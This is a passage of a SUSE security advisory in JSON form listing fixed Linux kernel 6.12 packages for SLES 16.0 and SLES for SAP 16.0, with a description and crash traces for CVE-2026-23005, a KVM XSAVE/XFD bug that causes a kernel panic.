"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23002"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
